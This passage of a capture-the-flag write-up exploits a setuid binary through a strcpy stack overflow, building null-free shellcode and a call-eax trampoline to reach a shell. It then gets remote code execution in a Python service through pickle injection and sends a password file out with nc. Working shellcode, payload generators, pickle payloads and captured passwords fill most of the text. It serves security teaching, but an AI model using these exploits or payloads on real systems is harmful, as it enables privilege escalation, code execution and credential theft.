| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | | |
| +------------+------------+ |
+-------->| 0xffa3ede0 | | <-+
+------------+------------+
Let's look at how that strcpy
call works. First, we push on the address of
the str
parameter with:
mov eax,DWORD PTR [ebp+0x8]
mov DWORD PTR [esp+0x4],eax
Now our stack looks like this:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3ede0 | | <-+
+------------+------------+
Now, we calculate the start address of buf
, and put it on the top of the stack:
lea eax,[ebp-0x408]
mov DWORD PTR [esp],eax
Directly before and directly after the call to strcpy
, our stack looks like
this:
esp ebp Address Value
| | +------------+------------+
| | | 0xffa3f218 | 0xffa3f298 | <-+
| | +------------+------------+ |
| | . | `main`s
| | . | stack
| | . | frame
| | +------------+------------+ |
| | | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| | +------------+------------+ |
| | | 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
| | +------------+------------+
| +--->| 0xffa3f1f8 | 0xffa3f218 | <-+
| +------------+------------+ |
| | 0xffa3f1f4 | | |
| +------------+------------+ |
| | 0xffa3f1f0 | | |
| +------------+------------+ |
| | 0xffa3f1ec | | <-+ |
| +------------+------------+ | |
| . | 1024 |
| . | byte | `fun`s
| . | `buf` | stack
| +------------+------------+ | | frame
| | 0xffa3edf0 | | <-+ |
| +------------+------------+ |
| | 0xffa3edec | | |
| +------------+------------+ |
| | 0xffa3ede8 | | |
| +------------+------------+ |
| | 0xffa3ede4 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3ede0 | 0xffa3edf0 |----> beginning of `buf` <-+
+------------+------------+
Let's see what happens after the call. The leave
instruction is basically just
sugar for the two instructions mov esp, ebp
and pop ebp
. This is what the stack
looks like afterwards:
esp ebp Address Value
| | +------------+------------+
| +--->| 0xffa3f218 | 0xffa3f298 | <-+
| +------------+------------+ |
| . | `main`s
| . | stack
| . | frame
| +------------+------------+ |
| | 0xffa3f200 | 0xffa3f92b |----> parameter `*str` |
| +------------+------------+ |
+-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun` <-+
+------------+------------+
With one instruction, we're back to our original picture. Neat. Now all that's left
is the ret
instruction, which simply pops the last value off the stack, and jumps
to it. After ret
, execution will continue at the address 0x080484dc.
Ok whew, all that was just to make sure we have all our mental model straight for
the real work ahead. Notice that the return location is stored extremely close to
buf
, and there's nothing stopping us from overwriting it. Putting together the
pieces, we want to inject the malicious string of assembly we constructed earlier
into memory somewhere, and overwrite the return address from fun to point to it.
We also need to include the actual cat
command that we're going to pass to the
system
function call. Here's one way to lay out our buffer:
The command:
cat /etc/level05/.password ; #
|------------30--------------|
The function call:
\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0
|--------------------12------------------------|
The padding:
<any character that isn't \0>
|----------994--------------|
The overwritten return address:
\x??\x??\x??\x??
|------4-------|
The padding is the magic that gets everything going. It should push the address
we'll be crafting in a moment into the return address from fun
. Let's try it
with 0x12345678 for our return address. We'll get a segfault, but we'll know we're
on the right track. I'm going to make a ruby file make_payload.rb
to make the
actual payload:
command = "cat /etc/level05/.password ; #"
code = "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
padding = 'a' * 994
addr = "\x78\x56\x34\x12"
File.open("payload", "w") { | f | f.write(command + code + padding + addr) }
Once we run it, we should have what we want in payload
. Alright, let's see
what happens when we use that as input to the program:
$ gdb /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble fun
Dump of assembler code for function fun:
0x08048484 <+0>: push ebp
0x08048485 <+1>: mov ebp,esp
0x08048487 <+3>: sub esp,0x418
0x0804848d <+9>: mov eax,DWORD PTR [ebp+0x8]
0x08048490 <+12>: mov DWORD PTR [esp+0x4],eax
0x08048494 <+16>: lea eax,[ebp-0x408]
0x0804849a <+22>: mov DWORD PTR [esp],eax
0x0804849d <+25>: call 0x8048388 <strcpy@plt>
0x080484a2 <+30>: leave
0x080484a3 <+31>: ret
End of assembler dump.
(gdb) break *0x080484a2
Breakpoint 1 at 0x80484a2
(gdb) run "`cat payload`"
Starting program: /levels/level04 "`cat payload`"
Breakpoint 1, 0x080484a2 in fun ()
(gdb) x/1xw $ebp+4
0xff86e98c: 0x12345678
Well look at that! There's our injected address right where we wanted it! Now,
let's start making some numbers real. Ok, let's find the address of system
,
because our payload needs that:
(gdb) print system
No symbol table is loaded. Use the "file" command.
Hmmm, ok, so gdb doesn't work very well without debug symbols. Surely we can find it with nm:
$ nm /levels/level04 | grep system
$
So here's the thing, that symbol doesn't exist in our binary at all because
there was no reason to link it in, because the program contains no usages of
it! Clearly we need a new approach. One option would be to find another function
that is linked in that could be made to print the contents of a file. In terms
of libc functions, we have exit
, printf
, puts
, and strcpy
. Ok, so if we
read in the contents of /home/level05/.password
, then we can probably figure
out how to print it out with printf
or puts
. But how do we read the file?
We don't have the read
symbol, so we seem to be back at square one.
At this point, we need to understand what those magical libc functions actually
do. The long story short is that functions like system
and read
end up calling
Linux system calls, and even longer story even shorter, we can do that ourselves
by using the 0x80 interrupt vector. It works like this: you put the number of
the system call into eax, and the arguments to the call into ebx, ecx, and edx
you execute int 0x80
, and the kernel takes over. You can find the list of
supported syscalls with their numbers in /usr/include/asm/unistd_32.h
, and
you can find their signatures in man 2 <syscall>
. Note, there is no system
syscall. I suspect the system
function eventually calls execve
after doing
some parameter parsing.
I'm sure we could figure out how to use execve
to run our cat
command, but
I think there's a better way. The cat
command with a single argument merely
reads the file named by that argument into memory, and writes it out to standard
out. This can be done with three syscalls: open
to get a descriptor for a file
by name, read
to read from that descriptor into memory, and write
to write
to the (already open) descriptor for standard out. Let's write some code for
this! First, we'll make a full version that runs as a standalone program, so we
can test that it works:
SECTION .bss
BufLen equ 16
Buf resb BufLen
SECTION .data
FileName db "blah", 0x0
SECTION .text
global _start ; Entry point for ld
_start:
mov eax, 5 ; `open` syscall
mov ebx, FileName ; Open FileName
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, Buf ; Read into Buf
mov edx, BufLen ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, Buf ; Write from Buf
mov edx, BufLen ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
Now you should be able to "cat" a file named "blah":
$ nasm -f elf32 -g -o level04.o level04.asm
$ ld -o level04 level04.o
$ echo "blah" > blah
$ ./level04
blah
Ok good, but now we need to make this more suitable for injection. We won't have
the luxury of running in the .text
section or referencing any symbols at all.
We'll be running purely from within a chunk of memory in .bss
. Let's see if
we can mimic this setup and keep our program working:
SECTION .data
mov esi, 0x8049088 ; Keep track of location of our code
mov eax, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 91 ; Code takes 75 bytes, buffer takes 16
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, esi
add ecx, 75 ; 72 bytes of code, then buffer starts
mov edx, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, esi
add ecx, 75 ; Write from Buf
mov edx, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
db "blah", 0x0
SECTION .text
global _start ; Entry point for ld
_start:
jmp 0x8049088
Note that the chunk of code in .data
is fully self-contained. If we manage to
jump to it, and if it actually lives at 0x8049088, it will print the contents of
the blah
file. Good, let's turn this runnable program into the 1040-byte string
payload we need to overflow our buffer the way we want. We'll replace the string
"blah" with "/home/level05/.password" to get the real file we want, remove all
the support code, add a word at the end with the address of our code, and pad
before it with no-ops to get the right length. We also need to add BITS 32
in
anticipation of building a flat binary, which defaults to 16-bit mode:
BITS 32
mov esi, 0x8049088 ; Keep track of location of our code
mov eax, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 91 ; Code takes 75 bytes, buffer takes 16
mov ecx, 0 ; Read-only
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov eax, 3 ; `read` syscall
mov ecx, esi
add ecx, 75 ; 72 bytes of code, then buffer starts
mov edx, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov eax, 4 ; `sys_write` syscall
mov ebx, 1 ; Use stdout
mov ecx, esi
add ecx, 75 ; Write from Buf
mov edx, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov eax, 1 ; `exit` syscall
mov ebx, 0 ; Exit code 0
int 0x80 ; Exit
db 0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0
db "/home/level05/.password", 0x0
times 921 nop
dd 0x8049088
Now we generate a flat binary and make sure it's the right size:
$ nasm -f bin -o level04.o level04.asm
$ wc -c level04.o
1040 level04.o
There's a minorly interesting problem here. We can't use scp to get our payload
over to the ctf machine. There are a number of ways to work around this, but I
ended up copying the hex version of it from the output of the xxd
command locally,
and pasting it as input to xxd
remotely:
$ xxd -p level04.o | pbcopy # Local
$ echo "66be88..." > payload.hex # Remote
$ xxd -p -r < payload.hex > payload
$ wc -c payload
1040
Ok, we still don't expect this to work, but we're getting closer. Let's run it and see what things look like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/32xb $ebp-0x408
0xffd662f0: 0x66 0xbe 0x88 0x90 0x04 0x08 0x66 0xb8
0xffd662f8: 0x05 0x66 0x89 0xf3 0x66 0x83 0xc3 0x5b
0xffd66300: 0x66 0xb9 0xcd 0x80 0x66 0x89 0xc3 0x66
0xffd66308: 0xb8 0x03 0x66 0x89 0xf1 0x66 0x83 0xc1
Hmm, our bytes look sorta right, but not quite. Let's look more closely at the beginning of the hexdump:
0000000: 66 be 88 90 04 08 66 b8 f.....f.
0000008: 05 00 00 00 66 89 f3 66 ....f..f
0000010: 83 c3 5b 66 b9 00 00 00 ..[f....
0000018: 00 cd 80 66 89 c3 66 b8 ...f..f.
Ah, it looks good through 66 b8 05
, but then the next byte is 66
, when it
should be 00
three times! What has happened is that strcpy
has trimmed our
null bytes. How annoying. We need to write a new version of our payload with null
bytes carefully avoided. Here goes:
BITS 32
mov esi, 0x08049088 ; Keep track of location of our code
mov al, 5 ; `open` syscall
mov ebx, esi ; Open FileName
add ebx, 67 ; Code takes 51 bytes, buffer takes 16
xor ecx, ecx ; Read-only
mov BYTE [esi+90], cl ; Need 0x0 as last byte in filename for open call
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov al, 3 ; `read` syscall
mov ecx, esi
add ecx, 51 ; 51 bytes of code, then buffer starts
mov dl, 16 ; Read BufLen bytes
int 0x80 ; Make syscall
mov al, 4 ; `sys_write` syscall
mov bl, 1 ; Use stdout
mov ecx, esi
add ecx, 51 ; Write from Buf
mov dl, 16 ; Write BufLen bytes
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
db 0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1
db "/home/level05/.password", 0x1
times 945 nop
dd 0x08049088
A lot of our null bytes were coming from moving 4-byte values that were actually
only 1-byte values, thus leaving the top 3 bytes as 0. The rest were coming from
data initialization. In the case of the buffer, it doesn't matter what it is
initially since we never use the intialized values, but in the case of the file
name, we have to set its last byte back to 0 before passing it to the open
call
or it won't find the proper end of our string. Of course after changing instructions
we had to recalculate all the addresses and add some more nops. After transferring
the binary, let's see what it looks like now:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/8i $ebp - 0x408
0xffbca040: mov esi,0x08049088
0xffbca046: mov al,0x5
0xffbca048: mov ebx,esi
0xffbca04b: add ebx,0x43
0xffbca04f: xor ecx,ecx
0xffbca052: mov BYTE PTR [ebp+0x5a],cl
0xffbca056: int 0x80
(gdb) x/w $ebp + 4
0xffbca44c: 0x08049088
Looks great! We still need to make our absolute addresses point to the right thing
though! It should point right to the beginning of the buffer, which is at ebp-0x408
,
so let's grab that value:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) print $ebp-0x408
$1 = (void *) 0xffbca040
Open up a hex editor and modify the values:
$ xxd payload > payload.hex
# Replace 8890 0408 with 40a0 bcff
$ xxd -r payload.hex > payload
Now let's see what it looks like:
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/w $ebp+4
0xffab302c: 0xffbca040
Nice, we got our location into the return address! Let's make sure it still points to the beginning of the buffer like we want:
(gdb) print $ebp-0x408
$4 = (void *) 0xffab2c20
D'oh! Our address moved. What happened is stack-randomization. To make exactly
the type of thing we're trying to do harder, many modern systems root their stacks
at a random place in memory. It makes it significantly more difficult to hard-code
jumps into code you've injected onto the stack. So what do we do now? Well, one
common technique is to pick a value and try over and over again until that value
happens to be correct. This can be improved on by putting the filler nops at the
beginning of the payload instead of the end, creating a "nop slide", where any
the payload will work regardless of what instruction in the nop slide it hits.
This helps a reasonable amount and would almost certainly work with as many nops
as we have, but we can actually use a far more clever technique to remove the
non-determinism entirely. Note that after the call to strcpy
, we still have
the address of our buffer in eax:
(gdb) print/x $ebp-0x408
$10 = 0xffab2c20
(gdb) print/x $eax
$11 = 0xffab2c20
We have two occurrences of the absolute address that we need to get rid of. If
we can assume that the address is in eax when our code begins, the first occurrence
is easy. We just need to change our first instruction to mov esi, eax
. The
second occurrence is the clever part - if we can find a jmp eax
or call eax
instruction somewhere in the binary at an absolute address, we can use that as
our absolute address to return to, and it will then call into our buffer! So
let's go sleuthing, starting with the symbols defined in the .text
section,
which we know contain code:
$ objdump -t /levels/level04 | grep .text
080483d0 l d .text 00000000 .text
08048400 l F .text 00000000 __do_global_dtors_aux
08048460 l F .text 00000000 frame_dummy
08048560 l F .text 00000000 __do_global_ctors_aux
080484f0 g F .text 00000005 __libc_csu_fini
080483d0 g F .text 00000000 _start
08048484 g F .text 00000020 fun
08048500 g F .text 0000005a __libc_csu_init
0804855a g F .text 00000000 .hidden __i686.get_pc_thunk.bx
080484a4 g F .text 0000004b main
(gdb) disassemble __do_global_dtors_aux
# ... Nothing useful
(gdb) disassemble frame_dummy
Dump of assembler code for function frame_dummy:
0x08048460 <+0>: push ebp
0x08048461 <+1>: mov ebp,esp
0x08048463 <+3>: sub esp,0x18
0x08048466 <+6>: mov eax,ds:0x8049f1c
0x0804846b <+11>: test eax,eax
0x0804846d <+13>: je 0x8048481 <frame_dummy+33>
0x0804846f <+15>: mov eax,0x0
0x08048474 <+20>: test eax,eax
0x08048476 <+22>: je 0x8048481 <frame_dummy+33>
0x08048478 <+24>: mov DWORD PTR [esp],0x8049f1c
0x0804847f <+31>: call eax
0x08048481 <+33>: leave
0x08048482 <+34>: ret
0x08048483 <+35>: nop
End of assembler dump.
Look at that! Right there at 0x0804847f is the call eax
we need. Alright, let's
modify our payload one more time:
BITS 32
mov esi, eax ; Keep track of location of our code
xor eax, eax ; Clear eax
mov al, 5 ; `open` syscall
mov ebx, esi ; Calculate FileName address offset from beginning of code
add ebx, 52+16 ; Code takes 52 bytes, buffer takes 16
xor ecx, ecx ; Read-only
mov BYTE [esi+52+16+22+1], cl ; Need 0x0 as last byte in filename for open call. Code takes 48, buffer 16, filename 22
int 0x80 ; Make syscall
mov ebx, eax ; Put descriptor returned from `open` in ebx for `read` call
mov al, 3 ; `read` syscall
mov ecx, esi ; Calculate buffer address from beginning of code
add ecx, 52 ; 48 bytes of code, then buffer starts
mov dl, 16 ; Read 16 bytes
int 0x80 ; Make syscall
mov al, 4 ; `sys_write` syscall
mov bl, 1 ; Use stdout
mov ecx, esi ; Calculate buffer address from beginning of code
add ecx, 52 ; Write from buffer
xor edx, edx ; Make sure edx is empty
mov dl, 16 ; Write 16 bytes
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
times 16 db 0x1
db "/home/level05/.password", 0x1
times 944 nop
dd 0x0804847f
Alright, let's try it out!
(gdb) break *0x080484a2
(gdb) run "`cat payload`"
(gdb) x/xw $ebp+4
0xffaf11ec: 0x0804847f
(gdb) x/i 0x0804847f
0x804847f <frame_dummy+31>: call eax
(gdb) print/x $eax
$1 = 0xffaf0de0
(gdb) print/x $ebp-0x408
$2 = 0xffaf0de0
(gdb) disp/i $eip
1: x/i $eip
=> 0x80484a2 <fun+30>: leave
(gdb) stepi
0x080484a3 in fun ()
1: x/i $eip
=> 0x80484a3 <fun+31>: ret
(gdb)
Cannot access memory at address 0x90909094
(gdb)
Cannot access memory at address 0x90909094
(gdb)
0xffaf0de2 in ?? ()
1: x/i $eip
=> 0xffaf0de2: xor eax,eax
(gdb) stepi
0xffaf0de4 in ?? ()
1: x/i $eip
=> 0xffaf0de4: mov al,0x5
(gdb)
0xffaf0de6 in ?? ()
1: x/i $eip
=> 0xffaf0de6: mov ebx,esi
(gdb)
0xffaf0de8 in ?? ()
1: x/i $eip
=> 0xffaf0de8: add ebx,0x44
(gdb)
0xffaf0deb in ?? ()
1: x/i $eip
=> 0xffaf0deb: xor ecx,ecx
(gdb)
0xffaf0ded in ?? ()
1: x/i $eip
=> 0xffaf0ded: mov BYTE PTR [esi+0x5b],cl
(gdb)
0xffaf0df0 in ?? ()
1: x/i $eip
=> 0xffaf0df0: int 0x80
(gdb)
0xffaf0df2 in ?? ()
1: x/i $eip
=> 0xffaf0df2: mov ebx,eax
(gdb) print $eax
$3 = -13
That was great! It jumped into and ran our code! We got an error from our open
call, but that is to be expected - recall that the setuid mechanism doesn't work
when running under gdb. At this point we just need to cross our fingers and run
it!
$ /levels/level04 "`cat payload`"
WNWfdC5eWkIM
Ta-da! The level05
user has password "WNWfdC5eWkIM".
We wrote some very specific exploit code for the use case of reading out a file
with a known name, but we may not always know exactly what we want to do with
our heightened permissions. Because of this, the most comment exploit is to run
a brand new shell instance, which will inherit the heightened permissions. This
looks more similar to our previous exploit using system
in that we want to
execute a program by name. Instead of cat
, we want to execute the shell found
at /bin/sh
. Recall that I speculated that system
probably eventually calls
the execve
syscall. We're going to call it directly. The execve
call is number
11, and its signature is:
int execve(const char *filename, char *const argv[], char *const envp[])
The filename
parameter is a pointer to a null-terminated string, argv
is a
pointer to an array of null-terminated string arguments to the program, the first
of which is conventionally the name of file, and envp
is the environment the
program should execute under. For filename
we need to pass a pointer to the
string /bin/sh
, which we can do with the same technique we used for the file
name in our previous payload. We don't need to send any arguments to the program,
but we do need to get the filename in as the first parameter. We'll already have
a pointer to the filename, so we can just pass a pointer to that pointer for argv
.
We can safely point to a blank array for envp
- a blank array of pointers is
just a single null pointer, which we'll already have at the end of argv, so we'll
just re-use that. I won't go into too much detail on the final result, but most
of it should make sense after working through our previous exploit:
BITS 32
_code:
mov esi, eax ; Keep track of location of our code
xor eax, eax ; Clear eax
mov al, 11 ; `execve` syscall
lea ebx, [esi+ToFileName] ; ebx gets pointer to filename string
xor ecx, ecx ; Clear ecx so it can be used to clear some memory
mov BYTE [esi+ToFileNameEnd], cl; Clear the byte at the end of FileName to make it a valid char*
lea edx, [esi+ToArgVEnd] ; edx gets the address of the NULL word at the end of argv, representing an empty char*[] for envp
mov DWORD [edx], ecx ; Clear the word at the end of ArgV to make it a valid char*[]
lea ecx, [esi+ToArgV] ; ecx gets the address of argv
mov [ecx], ebx ; Make the first element of argv point to filename
int 0x80 ; Make syscall
mov al, 1 ; `exit` syscall
xor ebx, ebx ; Exit code 0
int 0x80 ; Exit
ToFileName equ $-_code ; The distance to the FileName storage
FileName db "/bin/sh"
ToFileNameEnd equ $-_code ; The distance to the NULL byte ending filename
FileNameEnd db 0x1
ToArgV equ $-_code ; The distance to the beginning of argv
FileNamePtr dd 0x01010101
ToArgVEnd equ $-_code ; The distance to the NULL word ending argv and envp
ArgVEnd dd 0x01010101
CodeSize equ $-_code ; Size of code, so that we can calculate how many nops we need
times 1036-CodeSize nop ; Pad with nops to make the length 1036
dd 0x0804847f ; Address of instruction of `call eax` or `jmp eax`
Aaaand, it works!
$ /levels/level04 "`cat payload`"
$ whoami
level05
$ cat /home/level05/.password
WNWfdC5eWkIM
This approach is much more flexible - we can probably re-use it in other circumstances and only need to chance the number of no-ops and the address at the end.
Log on in as level05
with WNWfdC5eWkIM
as the password.
The deal is that the level06
user is running an uppercaser service, which is
accessible through HTTP on port 9020. Let's take a look:
$ curl 127.0.0.1:9020 -d 'hello friend'
{
"processing_time": 1.0967254638671875e-05,
"queue_time": 0.6934969425201416,
"result": "HELLO FRIEND"
}
Not too much too go on here, but it's definitely interesting that we are getting
timing information. Could be that we can formulate an attack that uses the timing
information to leak something important to us. This is the first level that uses
python, with the code living directly in the setuid executable /levels/level05
.
It's too long to copy here, so we'll just pick and choose the interesting parts
as we go.
From an exploitation perspective, there are two major red flags, which we'll be exploiting, both of which live in a single method:
def deserialize(serialized):
logger.debug('Deserializing: %r' % serialized)
parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
match = parser.match(serialized)
direction = match.group(1)
data = match.group(2)
job = pickle.loads(match.group(3))
return direction, data, job
The first thing that jumps out is the known-exploitable pickle
library. Its
documentation features a prominent warning:
Warning The pickle module is not intended to be secure against erroneous or
maliciously constructed data. Never unpickle data received from an untrusted or
unauthenticated source.
This is not an idle warning - pickle
can be used to execute nearly arbitrary
code. It is possible to use pickle
securely, but it requires a high level of
paranoia about the data being processed. At first blush, the deserialize
method
doesn't appear to unpickle user data. The only data we control should be the
portion matched by the data: (.*?);
part of the regex. That's where the second
red flag comes in: we can clearly inject data into the job: (.*?)
match group
when we clearly aren't meant to be able to. Demonstration:
>>> data = "realdata; job: fakejob"
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(2)
'realdata'
>>> match.group(3)
"fakejob; job: S'realjob'\np0\n."
Oops, whatever we pass after ; job:
will get passed directly to pickle.loads
just what the docs told us not to allow! So let's look at how you actually exploit
pickle
. A pickled string is actually a self-contained stack-based programming
language, so it's possible to learn its language and write your exploit directly
in it. That's a pain, so fortunately there's a shortcut - when dumping an object,
pickle
will look for a method called __reduce__
, and use its return value to
construct the string. The return value is meant to something callable, and a tuple
of arguments to that callable thing, in a particular format. Here's an example:
import subprocess
class Echo(object):
def __reduce__(self):
return (subprocess.Popen, (('echo', 'blah'),))
import pickle
>>> x = Echo()
>>> pickle.dumps(x)
"csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> pickle.loads(_)
blah
That's actually not the scary part. In a completely new python instance on any machine with a python interpreter, I can now do:
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n.")
That string is a self-contained echo-er anywhere I can manage to get it into a
pickle.loads
call. To underscore the point by putting things together:
import pickle
import re
>>> data = "realdata; job: csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(3)
>>> pickle.loads(match.group(3))
blah
Ok, now that we know we can inject behavior into the server using a bad regex and
pickle
, we can start thinking about how to take advantage of it. It seems like
the least fussy thing to do is to send the password over the local network. The
nc
tool is great for stuff like this. Let's play around with it a bit:
$ nc -l 127.0.0.1 12345 &
[2] 9513
$ nc 127.0.0.1 12345 < /home/level05/.password
WNWfdC5eWkIM
Pretty straightforward - we set up a background process listening on a port and
then send some data through that port, which gets printed by the listening process.
We don't quite have it in the format we need it in to work with subprocess.Popen
because < /home/level05/.password
isn't a normal command argument. What we need
is to send the entire command as an argument to the shell binary itself:
$ nc -l 127.0.0.1 12345 &
[2] 9527
$ /bin/sh -c "nc 127.0.0.1 12345 < /home/level05/.password"
WNWfdC5eWkIM
Now we're just executable a single program with two arguments. Here's our pickle
exploiting stub:
import subprocess
class NcPassword(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/sh', '-c', 'nc 127.0.0.1 12345 < /home/level06/.password'),))
This generates this payload:
"csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n."
Which works as expected:
$ nc -l 127.0.0.1 12345 &
[2] 9552
$ python
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n.")
WNWfdC5eWkIM
At this point it's almost too easy - we change the path in our payload to point
to /home/level06.password
, start our listener, and post to the service with the
payload after ; job:
:
$ nc -l 127.0.0.1 12345 &
$ curl 127.0.0.1:9020 -d "`echo -e "; job: csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level06/.password'\np3\ntp4\ntp5\nRp6\n."`"
18aRISxV3MUS
{
"result": "Job timed out"
}
Ohai password.